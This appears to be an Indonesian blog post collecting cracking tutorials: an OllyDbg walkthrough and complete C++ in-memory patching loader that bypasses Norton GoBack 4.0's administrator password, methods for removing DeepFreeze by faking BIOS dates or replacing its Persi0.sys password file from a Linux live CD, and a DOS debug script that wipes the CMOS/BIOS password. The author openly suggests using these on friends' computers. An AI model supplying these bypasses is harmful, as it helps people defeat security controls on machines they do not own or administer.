Norton GoBack memiliki mekanisme autentikasi untuk melindungi dirinya. Langkah – langkah berikut mengaktifkan mode “none” terhadap semua autentikasi yang terdapat dalam pengaturan Norton GoBack. Program yang harus Anda miliki yaitu OllyDbg yang dapat Anda download di bagian bawah.

1. Langkah pertama jalankan OllyDbg, buka file GBOption.exe pada “%Program Files%\Norton GoBack”. File inilah yang digunakan Norton GoBack untuk mengubah settingannya.
2. Selanjutnya tekan tombol F9. Jendela window baru dengan title “Norton GoBack Options” akan muncul. Pilih tab ke-2, click “Change  Level…”. Lalu akan muncul jendela window yang memberikan perubahan pada setiap action yaitu; enable/disable, uninstall, autobackup… Terdapat 3 level pengguna: ADMIN, USER dan NONE. Secara default, level untuk meng-uninstall adalah pengguna ADMIN, itu artinya Anda harus memiliki password untuk meng-uninstallnya. Setelah mengubah level ini menjadi NONE dan meng-click OK, program membutuhkan password ADMIN untuk proses autentikasi (jika Anda men-set password sebelumnya). Tapi disini kita tidak begitu membutuhkannya (lupakan password tersebut…..), dan kita akan melewati bagian ini.
3. Kembali lagi ke OllyDbg, cari alamat 0×0043697D dengan menekan tombol Ctrl+G, enter address tersebut kemudian klik OK. OllyDbg akan mengubah alamat tersebut menjadi seperti dibawah ini:
   00436970 > 8B0D A8964700 MOV ECX,DWORD PTR DS:[4796A8]
   00436976 . 50 PUSH EAX
   00436977 . 51 PUSH ECX
   00436978 . E8 93E9FFFF CALL GBOption.00435310
   0043697D . 83C4 08 ADD ESP,8
   00436980 . 85C0 TEST EAX,EAX ; eax == 0 if pwd is correct!
   00436982 . 0F954424 0F SETNE BYTE PTR SS:[ESP+F]
   Lihat di alamat (address) 0×00436978, inilah fungsi yang digunakan GoBack untuk memeriksa password administrator. Alamat tersebut akan bernila TRUE jika password yang dimasukkan benar, dan bernilai FALSE jika salah. Namun, karena kita tidak memiliki password tersebut, tentu saja fungsi ini akan kita kembalikan ke nilai FALSE. Jadi kita akan mengeset alamat 0×0043697D untuk mengembalikan nilainya. Pastikan pointer berada di alamat 0×0043697D, tekan F2 untuk mengesetnya (baris tersebut akan berwarna merah).
4. Masukkan password apapun sesuka hati dan ketika kembali ke Norton GoBack Options, klik OK, akan muncul kotak dialog untuk memasukkan password admin, masukkan kata apapun dan tekan OK. Sekarang, kontrol kembali ke OllyDgb, dan akan menjalankan alamat yang kita set lalu fungsi pause pun akan aktif. Lihat di register window di OllyDbg, kita akan melihat EAX = 0×00000090. Double klik alamat tersebut, rubah ke angka EAX menjadi 0×00000000 dan tekan F9 untuk melanjutkan. Sekarang kita akan melihat bahwa tidak ada warning message yang muncul. Semua setting yang kita rubah akan disimpan. Kita bisa memeriksanya kembali dengan meng-klik “Change Level…” untuk melihat hasilnya.
5. Sekarang langkah terakhir. Setelah mengubah semua action level menjadi NONE, kita dapat melakukan apapun dengan Norton GoBack tanpa harus memasukkan password admin. Kita bisa mengaktifkan atau me-nonaktifkan (enable/disable), uninstall, dll.
   Automatic loader:
   /*
   * DESCRIPTION:
   * This loader is used in bypassing admin password
   * of Norton GoBack 4.0
   *
   * TODO:
   * Patch in memory at @0×436980
   * Origin: 0×85,0xC0,0×0F,0×95,0×44,0×24,0×0F
   * Patch: 0×33,0xC0,0xC6,0×44,0×24,0×0F,0×00
   */// Goback Loader.cpp
   #include <windows.h>

   LPTSTR strExecFile = TEXT(“GBOptions.exe”);

   int APIENTRY WinMain(HINSTANCE hInstance,
   HINSTANCE hPrevInstance,
   LPTSTR lpCmdLine,
   int nCmdShow)
   {
   HANDLE hFile;
   STARTUPINFO si;
   PROCESS_INFORMATION pi;
   ZeroMemory(&si, sizeof(si));
   ZeroMemory(&pi, sizeof(pi));

   //Find GBOptions.exe
   if( (hFile = CreateFile(strExecFile, 0, FILE_SHARE_READ, NULL,
   OPEN_EXISTING,
   FILE_ATTRIBUTE_NORMAL, NULL) ) == INVALID_HANDLE_VALUE)
   {
   MessageBox(0, “GBOptions.exe does not exist”, “Bypass Norton GoBack
   4.0″, MB_ICONERROR);
   return -1;
   }
   CloseHandle(hFile);

   //createprocess with suspend
   if( CreateProcess(NULL, strExecFile, NULL, NULL, FALSE,
   CREATE_SUSPENDED, NULL, NULL, &si, &pi) == FALSE)
   {
   MessageBox(0, “Error executing GBOptions.exe”, “Bypass Norton GoBack
   4.0″, MB_ICONERROR);
   return -1;
   }
   //patching
   BYTE buf[10];
   DWORD bytesRead, bytesWritten;
   ReadProcessMemory(pi.hProcess, (LPVOID)0×436980, buf, 7, &bytesRead);

   //Compare origin bytes
   if( buf[0] == 0×85 && buf[1] == 0xC0 && buf[2] == 0×0F && buf[3] == 0×95
   &&
   buf[4] == 0×44 && buf[5] == 0×24 && buf[6] == 0×0F )
   {
   //Correct!
   BYTE newData[] = {0×33, 0xC0, 0xC6, 0×44, 0×24, 0×0F, 0×00};
   WriteProcessMemory(pi.hProcess, (LPVOID)0×436980, newData,
   sizeof(newData) /sizeof(newData[0]), &bytesWritten);

   //resume
   ResumeThread(pi.hThread);
   CloseHandle(pi.hProcess);
   CloseHandle(pi.hThread);
   MessageBox(0, “Bypass succesfully!”, “Bypass Norton GoBack 4.0″, MB_ICONINFORMATION);
   }
   else
   {
   //Failed
   MessageBox(0, “Wrong size???\nWrong version!”, “Bypass Norton GoBack
   4.0″, MB_ICONERROR);
   TerminateProcess(pi.hProcess, 0);
   CloseHandle(pi.hProcess);
   CloseHandle(pi.hThread);
   }
   return 0;
   }

Download OllyDbg

Credit to securityvulns

Artikel ini saya dapatkan dari Om Ktarou di forum sebelah. Cukup bagus untuk dijadiin referensi kalo-kalo computer temen2 ga bisa uninstall DeepFreeze ato ada sedikit masalah ma DeepFreeze trus pengen juga ngilanginya. Pada artikel ini, ada dua kasus yang terjadi dengan DeepFreeze dan ingin menghilangkan/uninstall DeepFreeze dari computer kalian atau computer orang, terserah yang penting berguna buat yang pake aja.

1. Kasus Pertama “DeepFreeze yang diinstall adalah versi trial. “ Hal ini bisa diakali dengan masuk ke BIOS dan ubah-ubah waktu yang sudah di-set. Set waktu yang ada dengan memajukan waktu 2 atau 3 tahun, intinya supaya waktu trialnya habis saja. Setelah itu, restart computer dan masuk ke desktop. Disitu biasanya ada pesan untuk segera me-remove / uninstall DeepFreeze karena sudah tidak berlaku lagi waktunya. Dengan demikian, kalian bisa remove DeepFreeze dengan mudah. [Masalah terselesaikan].
2. Kasus Kedua “DeepFreeze yang diinstall adalah versi full” Beda lagi kasusnya untuk yang satu ini. DeepFreeze yang terinstall biasanya sudah diproteksi dengan password. Untuk menonaktifkan password tersebut, tentunya kita perlu mengetahui password yang sudah di-set. Ada cara lain untuk menonaktifkan password tersebut, sehingga kalian dapat me-nonaktifkan atau bahkan me-uninstall DeepFreeze tersebut. Begini caranya: DeepFreeze menyimpan file informasi passwordnya di file bernama Persi0.sys [gambar 1]. File ini yang akan menjadi sasaran kita untuk dapat menonaktifkan password dan melakukan apapun terhadap DeepFreeze yang sudah terinstall. File ini akan kita replace dengan file yang sama tetapi tanpa password, kalian dapat mendownloadnya disini {link}. Untuk mengganti file tersebut dengan file yang sama hasil download diatas, tidak bisa dilakukan dengan copy-paste begitu saja. Kalian perlu menyediakan Live CD Linux agar operasi diatas dapat dilakukan. Tentunya Live CD Linux tersebut yang dapat membaca system file windows. Nah, pada kasus ini, menggunakan Live CD Ubuntu. Caranya;

- Boot Live CD Linux tersebut sampai masuk dan dapat melihat isi                           drive windows.

- Setelah itu, baru copy-paste [replace] file yang didownload diatas                       [gambar 2].

- Restart computer dan buka control windows DeepFreeze (SHIFT                           +double click icon DeepFreeze pada system tray).

Dan…….DeepFreeze pun tidak diproteksi, alias tanpa password.

Deep Freeze 6

Pernah nyoba menjebol deepfreeze versi 6.0.xxxx?
Saya dapat artikel ini dari blog sebelah. Mmmm,,,walaupun blom sempet dipraktekan, tapi mungkin bagi kalian yang kesel dengan ulah temen yang sok pake deepfreeze di komputernya,,bisa juga nyoba cara ini.

Pada dasarnya, deepfreeze versi berapapun dapat di-Uninstall dengan versi yang sama,, so kalian musti tau dulu deepfreeze yang dipake temen tu versinya berapa???? abis itu coba nonaktifkan deepfreezeNya. Caranya dapat dilakukan dengan cara menonaktifkan atau mengubah tahun yang terdapat pada BIOS,,,jika komputer temen kamu itu di-Install pada tahun 2008, maka kamu ubah tahunnya menjadi tahun 2009. Setelah itu coba restart komputer temen kamu itu, maka dengan otomatis deepfreeze yang udah di-install tidak akan aktif dan kamu udah bisa uninstall deepfreeze tersebut.

Tapiii,,,,,gimana kalo BIOSnya di pasword???? ini nih caranya:
klik start menu lalu klik menu run
ketikkan cmd pada textbox yang disediakan
ketikan debug pada command DOS lalu enter
lakukan perintah ini sampai akhir…

A <ENTER>
MOV AX,0 <ENTER>
MOV AX,CX <ENTER>
OUT 70,AL <ENTER>
MOV AX,0 <ENTER>
OUT 71,AL <ENTER>
INC CX <ENTER>
CMP CX,100 <ENTER>
JB 103 <ENTER>
INT 20 <ENTER>
<ENTER> just hit enter on this line
G <ENTER>
Q <ENTER>